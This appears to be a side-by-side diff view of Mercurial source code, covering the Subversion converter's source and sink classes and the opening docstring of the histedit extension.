1099 _(b'fetching revision log for "%s" from %d to %d\n')
1109 _(b'fetching revision log for "%s" from %d to %d\n')
1100 % (self.module, from_revnum, to_revnum)
1110 % (self.module, from_revnum, to_revnum)
1101 )
1111 )
1102
1112
1103 try:
1113 try:
1104 firstcset = None
1114 firstcset = None
1105 lastonbranch = False
1115 lastonbranch = False
1106 stream = self._getlog([self.module], from_revnum, to_revnum)
1116 stream = self._getlog([self.module], from_revnum, to_revnum)
1107 try:
1117 try:
1108 for entry in stream:
1118 for entry in stream:
1109 paths, revnum, author, date, message = entry
1119 paths, revnum, author, date, message = entry
1110 if revnum < self.startrev:
1120 if revnum < self.startrev:
1111 lastonbranch = True
1121 lastonbranch = True
1112 break
1122 break
1113 if not paths:
1123 if not paths:
1114 self.ui.debug(b'revision %d has no entries\n' % revnum)
1124 self.ui.debug(b'revision %d has no entries\n' % revnum)
1115 # If we ever leave the loop on an empty
1125 # If we ever leave the loop on an empty
1116 # revision, do not try to get a parent branch
1126 # revision, do not try to get a parent branch
1117 lastonbranch = lastonbranch or revnum == 0
1127 lastonbranch = lastonbranch or revnum == 0
1118 continue
1128 continue
1119 cset, lastonbranch = parselogentry(
1129 cset, lastonbranch = parselogentry(
1120 paths, revnum, author, date, message
1130 paths, revnum, author, date, message
1121 )
1131 )
1122 if cset:
1132 if cset:
1123 firstcset = cset
1133 firstcset = cset
1124 if lastonbranch:
1134 if lastonbranch:
1125 break
1135 break
1126 finally:
1136 finally:
1127 stream.close()
1137 stream.close()
1128
1138
1129 if not lastonbranch and firstcset and not firstcset.parents:
1139 if not lastonbranch and firstcset and not firstcset.parents:
1130 # The first revision of the sequence (the last fetched one)
1140 # The first revision of the sequence (the last fetched one)
1131 # has invalid parents if not a branch root. Find the parent
1141 # has invalid parents if not a branch root. Find the parent
1132 # revision now, if any.
1142 # revision now, if any.
1133 try:
1143 try:
1134 firstrevnum = self.revnum(firstcset.rev)
1144 firstrevnum = self.revnum(firstcset.rev)
1135 if firstrevnum > 1:
1145 if firstrevnum > 1:
1136 latest = self.latest(self.module, firstrevnum - 1)
1146 latest = self.latest(self.module, firstrevnum - 1)
1137 if latest:
1147 if latest:
1138 firstcset.parents.append(latest)
1148 firstcset.parents.append(latest)
1139 except SvnPathNotFound:
1149 except SvnPathNotFound:
1140 pass
1150 pass
1141 except svn.core.SubversionException as xxx_todo_changeme:
1151 except svn.core.SubversionException as xxx_todo_changeme:
1142 (inst, num) = xxx_todo_changeme.args
1152 (inst, num) = xxx_todo_changeme.args
1143 if num == svn.core.SVN_ERR_FS_NO_SUCH_REVISION:
1153 if num == svn.core.SVN_ERR_FS_NO_SUCH_REVISION:
1144 raise error.Abort(
1154 raise error.Abort(
1145 _(b'svn: branch has no revision %s') % to_revnum
1155 _(b'svn: branch has no revision %s') % to_revnum
1146 )
1156 )
1147 raise
1157 raise
1148
1158
1149 def getfile(self, file, rev):
1159 def getfile(self, file, rev):
1150 # TODO: ra.get_file transmits the whole file instead of diffs.
1160 # TODO: ra.get_file transmits the whole file instead of diffs.
1151 if file in self.removed:
1161 if file in self.removed:
1152 return None, None
1162 return None, None
1153 try:
1163 try:
1154 new_module, revnum = revsplit(rev)[1:]
1164 new_module, revnum = revsplit(rev)[1:]
1155 if self.module != new_module:
1165 if self.module != new_module:
1156 self.module = new_module
1166 self.module = new_module
1157 self.reparent(self.module)
1167 self.reparent(self.module)
1158 io = stringio()
1168 io = stringio()
1159 info = svn.ra.get_file(self.ra, file, revnum, io)
1169 info = svn.ra.get_file(self.ra, file, revnum, io)
1160 data = io.getvalue()
1170 data = io.getvalue()
1161 # ra.get_file() seems to keep a reference on the input buffer
1171 # ra.get_file() seems to keep a reference on the input buffer
1162 # preventing collection. Release it explicitly.
1172 # preventing collection. Release it explicitly.
1163 io.close()
1173 io.close()
1164 if isinstance(info, list):
1174 if isinstance(info, list):
1165 info = info[-1]
1175 info = info[-1]
1166 mode = (b"svn:executable" in info) and b'x' or b''
1176 mode = (b"svn:executable" in info) and b'x' or b''
1167 mode = (b"svn:special" in info) and b'l' or mode
1177 mode = (b"svn:special" in info) and b'l' or mode
1168 except svn.core.SubversionException as e:
1178 except svn.core.SubversionException as e:
1169 notfound = (
1179 notfound = (
1170 svn.core.SVN_ERR_FS_NOT_FOUND,
1180 svn.core.SVN_ERR_FS_NOT_FOUND,
1171 svn.core.SVN_ERR_RA_DAV_PATH_NOT_FOUND,
1181 svn.core.SVN_ERR_RA_DAV_PATH_NOT_FOUND,
1172 )
1182 )
1173 if e.apr_err in notfound: # File not found
1183 if e.apr_err in notfound: # File not found
1174 return None, None
1184 return None, None
1175 raise
1185 raise
1176 if mode == b'l':
1186 if mode == b'l':
1177 link_prefix = b"link "
1187 link_prefix = b"link "
1178 if data.startswith(link_prefix):
1188 if data.startswith(link_prefix):
1179 data = data[len(link_prefix) :]
1189 data = data[len(link_prefix) :]
1180 return data, mode
1190 return data, mode
1181
1191
1182 def _iterfiles(self, path, revnum):
1192 def _iterfiles(self, path, revnum):
1183 """Enumerate all files in path at revnum, recursively."""
1193 """Enumerate all files in path at revnum, recursively."""
1184 path = path.strip(b'/')
1194 path = path.strip(b'/')
1185 pool = svn.core.Pool()
1195 pool = svn.core.Pool()
1186 rpath = b'/'.join([self.baseurl, quote(path)]).strip(b'/')
1196 rpath = b'/'.join([self.baseurl, quote(path)]).strip(b'/')
1187 entries = svn.client.ls(rpath, optrev(revnum), True, self.ctx, pool)
1197 entries = svn.client.ls(rpath, optrev(revnum), True, self.ctx, pool)
1188 if path:
1198 if path:
1189 path += b'/'
1199 path += b'/'
1190 return (
1200 return (
1191 (path + p)
1201 (path + p)
1192 for p, e in pycompat.iteritems(entries)
1202 for p, e in pycompat.iteritems(entries)
1193 if e.kind == svn.core.svn_node_file
1203 if e.kind == svn.core.svn_node_file
1194 )
1204 )
1195
1205
1196 def getrelpath(self, path, module=None):
1206 def getrelpath(self, path, module=None):
1197 if module is None:
1207 if module is None:
1198 module = self.module
1208 module = self.module
1199 # Given the repository url of this wc, say
1209 # Given the repository url of this wc, say
1200 # "http://server/plone/CMFPlone/branches/Plone-2_0-branch"
1210 # "http://server/plone/CMFPlone/branches/Plone-2_0-branch"
1201 # extract the "entry" portion (a relative path) from what
1211 # extract the "entry" portion (a relative path) from what
1202 # svn log --xml says, i.e.
1212 # svn log --xml says, i.e.
1203 # "/CMFPlone/branches/Plone-2_0-branch/tests/PloneTestCase.py"
1213 # "/CMFPlone/branches/Plone-2_0-branch/tests/PloneTestCase.py"
1204 # that is to say "tests/PloneTestCase.py"
1214 # that is to say "tests/PloneTestCase.py"
1205 if path.startswith(module):
1215 if path.startswith(module):
1206 relative = path.rstrip(b'/')[len(module) :]
1216 relative = path.rstrip(b'/')[len(module) :]
1207 if relative.startswith(b'/'):
1217 if relative.startswith(b'/'):
1208 return relative[1:]
1218 return relative[1:]
1209 elif relative == b'':
1219 elif relative == b'':
1210 return relative
1220 return relative
1211
1221
1212 # The path is outside our tracked tree...
1222 # The path is outside our tracked tree...
1213 self.ui.debug(
1223 self.ui.debug(
1214 b'%r is not under %r, ignoring\n'
1224 b'%r is not under %r, ignoring\n'
1215 % (pycompat.bytestr(path), pycompat.bytestr(module))
1225 % (pycompat.bytestr(path), pycompat.bytestr(module))
1216 )
1226 )
1217 return None
1227 return None
1218
1228
1219 def _checkpath(self, path, revnum, module=None):
1229 def _checkpath(self, path, revnum, module=None):
1220 if module is not None:
1230 if module is not None:
1221 prevmodule = self.reparent(b'')
1231 prevmodule = self.reparent(b'')
1222 path = module + b'/' + path
1232 path = module + b'/' + path
1223 try:
1233 try:
1224 # ra.check_path does not like leading slashes very much, it leads
1234 # ra.check_path does not like leading slashes very much, it leads
1225 # to PROPFIND subversion errors
1235 # to PROPFIND subversion errors
1226 return svn.ra.check_path(self.ra, path.strip(b'/'), revnum)
1236 return svn.ra.check_path(self.ra, path.strip(b'/'), revnum)
1227 finally:
1237 finally:
1228 if module is not None:
1238 if module is not None:
1229 self.reparent(prevmodule)
1239 self.reparent(prevmodule)
1230
1240
1231 def _getlog(
1241 def _getlog(
1232 self,
1242 self,
1233 paths,
1243 paths,
1234 start,
1244 start,
1235 end,
1245 end,
1236 limit=0,
1246 limit=0,
1237 discover_changed_paths=True,
1247 discover_changed_paths=True,
1238 strict_node_history=False,
1248 strict_node_history=False,
1239 ):
1249 ):
1240 # Normalize path names, svn >= 1.5 only wants paths relative to
1250 # Normalize path names, svn >= 1.5 only wants paths relative to
1241 # supplied URL
1251 # supplied URL
1242 relpaths = []
1252 relpaths = []
1243 for p in paths:
1253 for p in paths:
1244 if not p.startswith(b'/'):
1254 if not p.startswith(b'/'):
1245 p = self.module + b'/' + p
1255 p = self.module + b'/' + p
1246 relpaths.append(p.strip(b'/'))
1256 relpaths.append(p.strip(b'/'))
1247 args = [
1257 args = [
1248 self.baseurl,
1258 self.baseurl,
1249 relpaths,
1259 relpaths,
1250 start,
1260 start,
1251 end,
1261 end,
1252 limit,
1262 limit,
1253 discover_changed_paths,
1263 discover_changed_paths,
1254 strict_node_history,
1264 strict_node_history,
1255 ]
1265 ]
1256 # developer config: convert.svn.debugsvnlog
1266 # developer config: convert.svn.debugsvnlog
1257 if not self.ui.configbool(b'convert', b'svn.debugsvnlog'):
1267 if not self.ui.configbool(b'convert', b'svn.debugsvnlog'):
1258 return directlogstream(*args)
1268 return directlogstream(*args)
1259 arg = encodeargs(args)
1269 arg = encodeargs(args)
1260 hgexe = procutil.hgexecutable()
1270 hgexe = procutil.hgexecutable()
1261 cmd = b'%s debugsvnlog' % procutil.shellquote(hgexe)
1271 cmd = b'%s debugsvnlog' % procutil.shellquote(hgexe)
1262 stdin, stdout = procutil.popen2(cmd)
1272 stdin, stdout = procutil.popen2(cmd)
1263 stdin.write(arg)
1273 stdin.write(arg)
1264 try:
1274 try:
1265 stdin.close()
1275 stdin.close()
1266 except IOError:
1276 except IOError:
1267 raise error.Abort(
1277 raise error.Abort(
1268 _(
1278 _(
1269 b'Mercurial failed to run itself, check'
1279 b'Mercurial failed to run itself, check'
1270 b' hg executable is in PATH'
1280 b' hg executable is in PATH'
1271 )
1281 )
1272 )
1282 )
1273 return logstream(stdout)
1283 return logstream(stdout)
1274
1284
1275
1285
1276 pre_revprop_change = b'''#!/bin/sh
1286 pre_revprop_change = b'''#!/bin/sh
1277
1287
1278 REPOS="$1"
1288 REPOS="$1"
1279 REV="$2"
1289 REV="$2"
1280 USER="$3"
1290 USER="$3"
1281 PROPNAME="$4"
1291 PROPNAME="$4"
1282 ACTION="$5"
1292 ACTION="$5"
1283
1293
1284 if [ "$ACTION" = "M" -a "$PROPNAME" = "svn:log" ]; then exit 0; fi
1294 if [ "$ACTION" = "M" -a "$PROPNAME" = "svn:log" ]; then exit 0; fi
1285 if [ "$ACTION" = "A" -a "$PROPNAME" = "hg:convert-branch" ]; then exit 0; fi
1295 if [ "$ACTION" = "A" -a "$PROPNAME" = "hg:convert-branch" ]; then exit 0; fi
1286 if [ "$ACTION" = "A" -a "$PROPNAME" = "hg:convert-rev" ]; then exit 0; fi
1296 if [ "$ACTION" = "A" -a "$PROPNAME" = "hg:convert-rev" ]; then exit 0; fi
1287
1297
1288 echo "Changing prohibited revision property" >&2
1298 echo "Changing prohibited revision property" >&2
1289 exit 1
1299 exit 1
1290 '''
1300 '''
1291
1301
1292
1302
1293 class svn_sink(converter_sink, commandline):
1303 class svn_sink(converter_sink, commandline):
1294 commit_re = re.compile(br'Committed revision (\d+).', re.M)
1304 commit_re = re.compile(br'Committed revision (\d+).', re.M)
1295 uuid_re = re.compile(br'Repository UUID:\s*(\S+)', re.M)
1305 uuid_re = re.compile(br'Repository UUID:\s*(\S+)', re.M)
1296
1306
1297 def prerun(self):
1307 def prerun(self):
1298 if self.wc:
1308 if self.wc:
1299 os.chdir(self.wc)
1309 os.chdir(self.wc)
1300
1310
1301 def postrun(self):
1311 def postrun(self):
1302 if self.wc:
1312 if self.wc:
1303 os.chdir(self.cwd)
1313 os.chdir(self.cwd)
1304
1314
1305 def join(self, name):
1315 def join(self, name):
1306 return os.path.join(self.wc, b'.svn', name)
1316 return os.path.join(self.wc, b'.svn', name)
1307
1317
1308 def revmapfile(self):
1318 def revmapfile(self):
1309 return self.join(b'hg-shamap')
1319 return self.join(b'hg-shamap')
1310
1320
1311 def authorfile(self):
1321 def authorfile(self):
1312 return self.join(b'hg-authormap')
1322 return self.join(b'hg-authormap')
1313
1323
1314 def __init__(self, ui, repotype, path):
1324 def __init__(self, ui, repotype, path):
1315
1325
1316 converter_sink.__init__(self, ui, repotype, path)
1326 converter_sink.__init__(self, ui, repotype, path)
1317 commandline.__init__(self, ui, b'svn')
1327 commandline.__init__(self, ui, b'svn')
1318 self.delete = []
1328 self.delete = []
1319 self.setexec = []
1329 self.setexec = []
1320 self.delexec = []
1330 self.delexec = []
1321 self.copies = []
1331 self.copies = []
1322 self.wc = None
1332 self.wc = None
1323 self.cwd = encoding.getcwd()
1333 self.cwd = encoding.getcwd()
1324
1334
1325 created = False
1335 created = False
1326 if os.path.isfile(os.path.join(path, b'.svn', b'entries')):
1336 if os.path.isfile(os.path.join(path, b'.svn', b'entries')):
1327 self.wc = os.path.realpath(path)
1337 self.wc = os.path.realpath(path)
1328 self.run0(b'update')
1338 self.run0(b'update')
1329 else:
1339 else:
1330 if not re.search(br'^(file|http|https|svn|svn\+ssh)://', path):
1340 if not re.search(br'^(file|http|https|svn|svn\+ssh)://', path):
1331 path = os.path.realpath(path)
1341 path = os.path.realpath(path)
1332 if os.path.isdir(os.path.dirname(path)):
1342 if os.path.isdir(os.path.dirname(path)):
1333 if not os.path.exists(
1343 if not os.path.exists(
1334 os.path.join(path, b'db', b'fs-type')
1344 os.path.join(path, b'db', b'fs-type')
1335 ):
1345 ):
1336 ui.status(
1346 ui.status(
1337 _(b"initializing svn repository '%s'\n")
1347 _(b"initializing svn repository '%s'\n")
1338 % os.path.basename(path)
1348 % os.path.basename(path)
1339 )
1349 )
1340 commandline(ui, b'svnadmin').run0(b'create', path)
1350 commandline(ui, b'svnadmin').run0(b'create', path)
1341 created = path
1351 created = path
1342 path = util.normpath(path)
1352 path = util.normpath(path)
1343 if not path.startswith(b'/'):
1353 if not path.startswith(b'/'):
1344 path = b'/' + path
1354 path = b'/' + path
1345 path = b'file://' + path
1355 path = b'file://' + path
1346
1356
1347 wcpath = os.path.join(
1357 wcpath = os.path.join(
1348 encoding.getcwd(), os.path.basename(path) + b'-wc'
1358 encoding.getcwd(), os.path.basename(path) + b'-wc'
1349 )
1359 )
1350 ui.status(
1360 ui.status(
1351 _(b"initializing svn working copy '%s'\n")
1361 _(b"initializing svn working copy '%s'\n")
1352 % os.path.basename(wcpath)
1362 % os.path.basename(wcpath)
1353 )
1363 )
1354 self.run0(b'checkout', path, wcpath)
1364 self.run0(b'checkout', path, wcpath)
1355
1365
1356 self.wc = wcpath
1366 self.wc = wcpath
1357 self.opener = vfsmod.vfs(self.wc)
1367 self.opener = vfsmod.vfs(self.wc)
1358 self.wopener = vfsmod.vfs(self.wc)
1368 self.wopener = vfsmod.vfs(self.wc)
1359 self.childmap = mapfile(ui, self.join(b'hg-childmap'))
1369 self.childmap = mapfile(ui, self.join(b'hg-childmap'))
1360 if util.checkexec(self.wc):
1370 if util.checkexec(self.wc):
1361 self.is_exec = util.isexec
1371 self.is_exec = util.isexec
1362 else:
1372 else:
1363 self.is_exec = None
1373 self.is_exec = None
1364
1374
1365 if created:
1375 if created:
1366 hook = os.path.join(created, b'hooks', b'pre-revprop-change')
1376 hook = os.path.join(created, b'hooks', b'pre-revprop-change')
1367 fp = open(hook, b'wb')
1377 fp = open(hook, b'wb')
1368 fp.write(pre_revprop_change)
1378 fp.write(pre_revprop_change)
1369 fp.close()
1379 fp.close()
1370 util.setflags(hook, False, True)
1380 util.setflags(hook, False, True)
1371
1381
1372 output = self.run0(b'info')
1382 output = self.run0(b'info')
1373 self.uuid = self.uuid_re.search(output).group(1).strip()
1383 self.uuid = self.uuid_re.search(output).group(1).strip()
1374
1384
1375 def wjoin(self, *names):
1385 def wjoin(self, *names):
1376 return os.path.join(self.wc, *names)
1386 return os.path.join(self.wc, *names)
1377
1387
1378 @propertycache
1388 @propertycache
1379 def manifest(self):
1389 def manifest(self):
1380 # As of svn 1.7, the "add" command fails when receiving
1390 # As of svn 1.7, the "add" command fails when receiving
1381 # already tracked entries, so we have to track and filter them
1391 # already tracked entries, so we have to track and filter them
1382 # ourselves.
1392 # ourselves.
1383 m = set()
1393 m = set()
1384 output = self.run0(b'ls', recursive=True, xml=True)
1394 output = self.run0(b'ls', recursive=True, xml=True)
1385 doc = xml.dom.minidom.parseString(output)
1395 doc = xml.dom.minidom.parseString(output)
1386 for e in doc.getElementsByTagName('entry'):
1396 for e in doc.getElementsByTagName('entry'):
1387 for n in e.childNodes:
1397 for n in e.childNodes:
1388 if n.nodeType != n.ELEMENT_NODE or n.tagName != 'name':
1398 if n.nodeType != n.ELEMENT_NODE or n.tagName != 'name':
1389 continue
1399 continue
1390 name = ''.join(
1400 name = ''.join(
1391 c.data for c in n.childNodes if c.nodeType == c.TEXT_NODE
1401 c.data for c in n.childNodes if c.nodeType == c.TEXT_NODE
1392 )
1402 )
1393 # Entries are compared with names coming from
1403 # Entries are compared with names coming from
1394 # mercurial, so bytes with undefined encoding. Our
1404 # mercurial, so bytes with undefined encoding. Our
1395 # best bet is to assume they are in local
1405 # best bet is to assume they are in local
1396 # encoding. They will be passed to command line calls
1406 # encoding. They will be passed to command line calls
1397 # later anyway, so they better be.
1407 # later anyway, so they better be.
1398 m.add(encoding.unitolocal(name))
1408 m.add(encoding.unitolocal(name))
1399 break
1409 break
1400 return m
1410 return m
1401
1411
1402 def putfile(self, filename, flags, data):
1412 def putfile(self, filename, flags, data):
1403 if b'l' in flags:
1413 if b'l' in flags:
1404 self.wopener.symlink(data, filename)
1414 self.wopener.symlink(data, filename)
1405 else:
1415 else:
1406 try:
1416 try:
1407 if os.path.islink(self.wjoin(filename)):
1417 if os.path.islink(self.wjoin(filename)):
1408 os.unlink(filename)
1418 os.unlink(filename)
1409 except OSError:
1419 except OSError:
1410 pass
1420 pass
1411
1421
1412 if self.is_exec:
1422 if self.is_exec:
1413 # We need to check executability of the file before the change,
1423 # We need to check executability of the file before the change,
1414 # because `vfs.write` is able to reset exec bit.
1424 # because `vfs.write` is able to reset exec bit.
1415 wasexec = False
1425 wasexec = False
1416 if os.path.exists(self.wjoin(filename)):
1426 if os.path.exists(self.wjoin(filename)):
1417 wasexec = self.is_exec(self.wjoin(filename))
1427 wasexec = self.is_exec(self.wjoin(filename))
1418
1428
1419 self.wopener.write(filename, data)
1429 self.wopener.write(filename, data)
1420
1430
1421 if self.is_exec:
1431 if self.is_exec:
1422 if wasexec:
1432 if wasexec:
1423 if b'x' not in flags:
1433 if b'x' not in flags:
1424 self.delexec.append(filename)
1434 self.delexec.append(filename)
1425 else:
1435 else:
1426 if b'x' in flags:
1436 if b'x' in flags:
1427 self.setexec.append(filename)
1437 self.setexec.append(filename)
1428 util.setflags(self.wjoin(filename), False, b'x' in flags)
1438 util.setflags(self.wjoin(filename), False, b'x' in flags)
1429
1439
1430 def _copyfile(self, source, dest):
1440 def _copyfile(self, source, dest):
1431 # SVN's copy command pukes if the destination file exists, but
1441 # SVN's copy command pukes if the destination file exists, but
1432 # our copyfile method expects to record a copy that has
1442 # our copyfile method expects to record a copy that has
1433 # already occurred. Cross the semantic gap.
1443 # already occurred. Cross the semantic gap.
1434 wdest = self.wjoin(dest)
1444 wdest = self.wjoin(dest)
1435 exists = os.path.lexists(wdest)
1445 exists = os.path.lexists(wdest)
1436 if exists:
1446 if exists:
1437 fd, tempname = pycompat.mkstemp(
1447 fd, tempname = pycompat.mkstemp(
1438 prefix=b'hg-copy-', dir=os.path.dirname(wdest)
1448 prefix=b'hg-copy-', dir=os.path.dirname(wdest)
1439 )
1449 )
1440 os.close(fd)
1450 os.close(fd)
1441 os.unlink(tempname)
1451 os.unlink(tempname)
1442 os.rename(wdest, tempname)
1452 os.rename(wdest, tempname)
1443 try:
1453 try:
1444 self.run0(b'copy', source, dest)
1454 self.run0(b'copy', source, dest)
1445 finally:
1455 finally:
1446 self.manifest.add(dest)
1456 self.manifest.add(dest)
1447 if exists:
1457 if exists:
1448 try:
1458 try:
1449 os.unlink(wdest)
1459 os.unlink(wdest)
1450 except OSError:
1460 except OSError:
1451 pass
1461 pass
1452 os.rename(tempname, wdest)
1462 os.rename(tempname, wdest)
1453
1463
1454 def dirs_of(self, files):
1464 def dirs_of(self, files):
1455 dirs = set()
1465 dirs = set()
1456 for f in files:
1466 for f in files:
1457 if os.path.isdir(self.wjoin(f)):
1467 if os.path.isdir(self.wjoin(f)):
1458 dirs.add(f)
1468 dirs.add(f)
1459 i = len(f)
1469 i = len(f)
1460 for i in iter(lambda: f.rfind(b'/', 0, i), -1):
1470 for i in iter(lambda: f.rfind(b'/', 0, i), -1):
1461 dirs.add(f[:i])
1471 dirs.add(f[:i])
1462 return dirs
1472 return dirs
1463
1473
1464 def add_dirs(self, files):
1474 def add_dirs(self, files):
1465 add_dirs = [
1475 add_dirs = [
1466 d for d in sorted(self.dirs_of(files)) if d not in self.manifest
1476 d for d in sorted(self.dirs_of(files)) if d not in self.manifest
1467 ]
1477 ]
1468 if add_dirs:
1478 if add_dirs:
1469 self.manifest.update(add_dirs)
1479 self.manifest.update(add_dirs)
1470 self.xargs(add_dirs, b'add', non_recursive=True, quiet=True)
1480 self.xargs(add_dirs, b'add', non_recursive=True, quiet=True)
1471 return add_dirs
1481 return add_dirs
1472
1482
1473 def add_files(self, files):
1483 def add_files(self, files):
1474 files = [f for f in files if f not in self.manifest]
1484 files = [f for f in files if f not in self.manifest]
1475 if files:
1485 if files:
1476 self.manifest.update(files)
1486 self.manifest.update(files)
1477 self.xargs(files, b'add', quiet=True)
1487 self.xargs(files, b'add', quiet=True)
1478 return files
1488 return files
1479
1489
1480 def addchild(self, parent, child):
1490 def addchild(self, parent, child):
1481 self.childmap[parent] = child
1491 self.childmap[parent] = child
1482
1492
1483 def revid(self, rev):
1493 def revid(self, rev):
1484 return b"svn:%s@%s" % (self.uuid, rev)
1494 return b"svn:%s@%s" % (self.uuid, rev)
1485
1495
1486 def putcommit(
1496 def putcommit(
1487 self, files, copies, parents, commit, source, revmap, full, cleanp2
1497 self, files, copies, parents, commit, source, revmap, full, cleanp2
1488 ):
1498 ):
1489 for parent in parents:
1499 for parent in parents:
1490 try:
1500 try:
1491 return self.revid(self.childmap[parent])
1501 return self.revid(self.childmap[parent])
1492 except KeyError:
1502 except KeyError:
1493 pass
1503 pass
1494
1504
1495 # Apply changes to working copy
1505 # Apply changes to working copy
1496 for f, v in files:
1506 for f, v in files:
1497 data, mode = source.getfile(f, v)
1507 data, mode = source.getfile(f, v)
1498 if data is None:
1508 if data is None:
1499 self.delete.append(f)
1509 self.delete.append(f)
1500 else:
1510 else:
1501 self.putfile(f, mode, data)
1511 self.putfile(f, mode, data)
1502 if f in copies:
1512 if f in copies:
1503 self.copies.append([copies[f], f])
1513 self.copies.append([copies[f], f])
1504 if full:
1514 if full:
1505 self.delete.extend(sorted(self.manifest.difference(files)))
1515 self.delete.extend(sorted(self.manifest.difference(files)))
1506 files = [f[0] for f in files]
1516 files = [f[0] for f in files]
1507
1517
1508 entries = set(self.delete)
1518 entries = set(self.delete)
1509 files = frozenset(files)
1519 files = frozenset(files)
1510 entries.update(self.add_dirs(files.difference(entries)))
1520 entries.update(self.add_dirs(files.difference(entries)))
1511 if self.copies:
1521 if self.copies:
1512 for s, d in self.copies:
1522 for s, d in self.copies:
1513 self._copyfile(s, d)
1523 self._copyfile(s, d)
1514 self.copies = []
1524 self.copies = []
1515 if self.delete:
1525 if self.delete:
1516 self.xargs(self.delete, b'delete')
1526 self.xargs(self.delete, b'delete')
1517 for f in self.delete:
1527 for f in self.delete:
1518 self.manifest.remove(f)
1528 self.manifest.remove(f)
1519 self.delete = []
1529 self.delete = []
1520 entries.update(self.add_files(files.difference(entries)))
1530 entries.update(self.add_files(files.difference(entries)))
1521 if self.delexec:
1531 if self.delexec:
1522 self.xargs(self.delexec, b'propdel', b'svn:executable')
1532 self.xargs(self.delexec, b'propdel', b'svn:executable')
1523 self.delexec = []
1533 self.delexec = []
1524 if self.setexec:
1534 if self.setexec:
1525 self.xargs(self.setexec, b'propset', b'svn:executable', b'*')
1535 self.xargs(self.setexec, b'propset', b'svn:executable', b'*')
1526 self.setexec = []
1536 self.setexec = []
1527
1537
1528 fd, messagefile = pycompat.mkstemp(prefix=b'hg-convert-')
1538 fd, messagefile = pycompat.mkstemp(prefix=b'hg-convert-')
1529 fp = os.fdopen(fd, 'wb')
1539 fp = os.fdopen(fd, 'wb')
1530 fp.write(util.tonativeeol(commit.desc))
1540 fp.write(util.tonativeeol(commit.desc))
1531 fp.close()
1541 fp.close()
1532 try:
1542 try:
1533 output = self.run0(
1543 output = self.run0(
1534 b'commit',
1544 b'commit',
1535 username=stringutil.shortuser(commit.author),
1545 username=stringutil.shortuser(commit.author),
1536 file=messagefile,
1546 file=messagefile,
1537 encoding=b'utf-8',
1547 encoding=b'utf-8',
1538 )
1548 )
1539 try:
1549 try:
1540 rev = self.commit_re.search(output).group(1)
1550 rev = self.commit_re.search(output).group(1)
1541 except AttributeError:
1551 except AttributeError:
1542 if not files:
1552 if not files:
1543 return parents[0] if parents else b'None'
1553 return parents[0] if parents else b'None'
1544 self.ui.warn(_(b'unexpected svn output:\n'))
1554 self.ui.warn(_(b'unexpected svn output:\n'))
1545 self.ui.warn(output)
1555 self.ui.warn(output)
1546 raise error.Abort(_(b'unable to cope with svn output'))
1556 raise error.Abort(_(b'unable to cope with svn output'))
1547 if commit.rev:
1557 if commit.rev:
1548 self.run(
1558 self.run(
1549 b'propset',
1559 b'propset',
1550 b'hg:convert-rev',
1560 b'hg:convert-rev',
1551 commit.rev,
1561 commit.rev,
1552 revprop=True,
1562 revprop=True,
1553 revision=rev,
1563 revision=rev,
1554 )
1564 )
1555 if commit.branch and commit.branch != b'default':
1565 if commit.branch and commit.branch != b'default':
1556 self.run(
1566 self.run(
1557 b'propset',
1567 b'propset',
1558 b'hg:convert-branch',
1568 b'hg:convert-branch',
1559 commit.branch,
1569 commit.branch,
1560 revprop=True,
1570 revprop=True,
1561 revision=rev,
1571 revision=rev,
1562 )
1572 )
1563 for parent in parents:
1573 for parent in parents:
1564 self.addchild(parent, rev)
1574 self.addchild(parent, rev)
1565 return self.revid(rev)
1575 return self.revid(rev)
1566 finally:
1576 finally:
1567 os.unlink(messagefile)
1577 os.unlink(messagefile)
1568
1578
1569 def puttags(self, tags):
1579 def puttags(self, tags):
1570 self.ui.warn(_(b'writing Subversion tags is not yet implemented\n'))
1580 self.ui.warn(_(b'writing Subversion tags is not yet implemented\n'))
1571 return None, None
1581 return None, None
1572
1582
1573 def hascommitfrommap(self, rev):
1583 def hascommitfrommap(self, rev):
1574 # We trust that revisions referenced in a map still is present
1584 # We trust that revisions referenced in a map still is present
1575 # TODO: implement something better if necessary and feasible
1585 # TODO: implement something better if necessary and feasible
1576 return True
1586 return True
1577
1587
1578 def hascommitforsplicemap(self, rev):
1588 def hascommitforsplicemap(self, rev):
1579 # This is not correct as one can convert to an existing subversion
1589 # This is not correct as one can convert to an existing subversion
1580 # repository and childmap would not list all revisions. Too bad.
1590 # repository and childmap would not list all revisions. Too bad.
1581 if rev in self.childmap:
1591 if rev in self.childmap:
1582 return True
1592 return True
1583 raise error.Abort(
1593 raise error.Abort(
1584 _(
1594 _(
1585 b'splice map revision %s not found in subversion '
1595 b'splice map revision %s not found in subversion '
1586 b'child map (revision lookups are not implemented)'
1596 b'child map (revision lookups are not implemented)'
1587 )
1597 )
1588 % rev
1598 % rev
1589 )
1599 )
@@ -1,2645 +1,2641 b''
1 # histedit.py - interactive history editing for mercurial
1 # histedit.py - interactive history editing for mercurial
2 #
2 #
3 # Copyright 2009 Augie Fackler <raf@durin42.com>
3 # Copyright 2009 Augie Fackler <raf@durin42.com>
4 #
4 #
5 # This software may be used and distributed according to the terms of the
5 # This software may be used and distributed according to the terms of the
6 # GNU General Public License version 2 or any later version.
6 # GNU General Public License version 2 or any later version.
7 """interactive history editing
7 """interactive history editing
8
8
9 With this extension installed, Mercurial gains one new command: histedit. Usage
9 With this extension installed, Mercurial gains one new command: histedit. Usage
10 is as follows, assuming the following history::
10 is as follows, assuming the following history::
11
11
12 @ 3[tip] 7c2fd3b9020c 2009-04-27 18:04 -0500 durin42
12 @ 3[tip] 7c2fd3b9020c 2009-04-27 18:04 -0500 durin42
13 | Add delta
13 | Add delta
14 |
14 |
15 o 2 030b686bedc4 2009-04-27 18:04 -0500 durin42
15 o 2 030b686bedc4 2009-04-27 18:04 -0500 durin42
16 | Add gamma
16 | Add gamma
17 |
17 |
18 o 1 c561b4e977df 2009-04-27 18:04 -0500 durin42
18 o 1 c561b4e977df 2009-04-27 18:04 -0500 durin42
19 | Add beta
19 | Add beta
20 |
20 |
21 o 0 d8d2fcd0e319 2009-04-27 18:04 -0500 durin42
21 o 0 d8d2fcd0e319 2009-04-27 18:04 -0500 durin42
22 Add alpha
22 Add alpha
23
23
24 If you were to run ``hg histedit c561b4e977df``, you would see the following
24 If you were to run ``hg histedit c561b4e977df``, you would see the following
25 file open in your editor::
25 file open in your editor::
26
26
27 pick c561b4e977df Add beta
27 pick c561b4e977df Add beta
28 pick 030b686bedc4 Add gamma
28 pick 030b686bedc4 Add gamma
29 pick 7c2fd3b9020c Add delta
29 pick 7c2fd3b9020c Add delta
30
30
31 # Edit history between c561b4e977df and 7c2fd3b9020c
